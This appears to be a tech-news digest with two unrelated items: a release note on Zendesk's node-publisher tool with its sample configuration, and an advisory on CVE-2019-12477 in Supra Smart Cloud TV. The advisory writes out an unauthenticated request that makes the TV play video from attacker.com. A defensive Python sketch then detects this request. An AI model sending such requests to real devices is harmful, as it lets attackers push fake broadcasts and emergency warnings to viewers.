Zendesk to Release Node Publisher

node-publisher is designed to help developers build Node packages properly
07 December 2018

Zendesk has developed node-publisher, a tool for building Node.js packages with one command.

When building a package, developers often skip a step, test the wrong version, or forget to run the tests at all. As a result, packages with errors end up in the Node.js repository. node-publisher is said to build packages automatically, without missing a single step. Among other things, this allows correct dependency management.

node-publisher combines five consecutive steps:

  1. Preparation: checks the working tree and the current Node version.
  2. Testing: running a code analyzer and tests.
  3. Build (optional): code verification with Babel.
  4. Publication.
  5. Post publication: creating a change log.

node-publisher relies on several elements of the project. In particular, it uses a specific git workflow, checks for the presence of a .nvmrc file, and relies on specific script names in package.json. When launched, a .release.yml file is created in the project root folder. The tool then performs only the steps and commands that are present in this configuration file:

rollback: true

prepare:
  - git diff-index --quiet HEAD --
  - git checkout master
  - git pull --rebase
  - '[[ -f .nvmrc ]] && ./node_modules/.bin/check-node-version --node $(cat .nvmrc)'
  - yarn install

test:
  - yarn travis

build:
  - yarn build
  - git diff --staged --quiet || git commit -am "Update build file"

after_publish:
  - git push --follow-tags origin master:master

changelog:
  - ./node_modules/.bin/offline-github-changelog > CHANGELOG.md
  - git add CHANGELOG.md
  - git commit --allow-empty -m "Update changelog"
  - git push origin master:master

 

Supra Smart Cloud TV to be Hacked

An attacker can replace the video being watched with their own content
04 June 2019

A vulnerability has been identified in the Supra Smart Cloud TV (CVE-2019-12477). It makes it possible to replace the broadcast currently being watched with the attacker's content. As an example, the display of a bogus emergency warning is shown.

To carry out the attack, it is enough to send a specially crafted network request that does not require authentication. In particular, an attacker can call the handler "/remote/media_control?action=setUri&uri=", specifying the URL of an m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8".

In most cases, access to the TV's IP address is limited to the internal network, but because the request is sent over HTTP, techniques for reaching internal resources can be used when the user opens a specially crafted external page (for example, disguising the request as an image load or using DNS rebinding).
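A detection sketch for the request pattern described above, added here as an example and not taken from the advisory or the vendor. The record fields (`src`, `host`, `referer`, `url`), the hostnames `rebind.example.net` and `news.example.org`, and the sample records are constructed. The code assumes that legitimate media sources and the TV itself sit on private (RFC 1918) addresses.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample records (not real traffic): fields as an HTTP-aware
# sensor or proxy on the TV's network segment might log them.
SAMPLE_REQUESTS = [
    {"src": "192.168.1.20", "host": "192.168.1.155", "referer": "",
     "url": "/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8"},
    {"src": "192.168.1.20", "host": "rebind.example.net", "referer": "http://rebind.example.net/",
     "url": "/remote/media_control?action=setUri&uri=http://192.168.1.10/movie.m3u8"},
    {"src": "192.168.1.20", "host": "192.168.1.155", "referer": "http://news.example.org/page",
     "url": "/remote/media_control?action=setUri&uri=http://192.168.1.10/movie.m3u8"},
    {"src": "192.168.1.10", "host": "192.168.1.155", "referer": "",
     "url": "/remote/media_control?action=setUri&uri=http://192.168.1.10/movie.m3u8"},
]

def is_private_ip(host):
    """True only for a literal private IP address; hostnames return False."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False

def classify(req):
    """Return the reasons a setUri request matches the CVE-2019-12477 pattern."""
    parts = urlsplit(req["url"])
    query = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    if parts.path != "/remote/media_control":
        return []
    if [a.lower() for a in query.get("action", [])] != ["seturi"]:
        return []
    reasons = []
    media_host = urlsplit(query.get("uri", [""])[0]).hostname or ""
    if not is_private_ip(media_host):
        reasons.append("media URI outside the local network")
    # A browser under DNS rebinding sends the external name in the Host header.
    if not is_private_ip(req["host"].split(":")[0]):
        reasons.append("Host header is not the TV's address (DNS rebinding)")
    referer_host = urlsplit(req["referer"]).hostname
    if referer_host and not is_private_ip(referer_host):
        reasons.append("triggered from an external web page")
    return reasons

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(r["src"], r["host"], classify(r) or "ok")
```

Because the handler accepts requests without authentication, the same three checks can also serve as block rules on a filtering proxy placed in front of the TV.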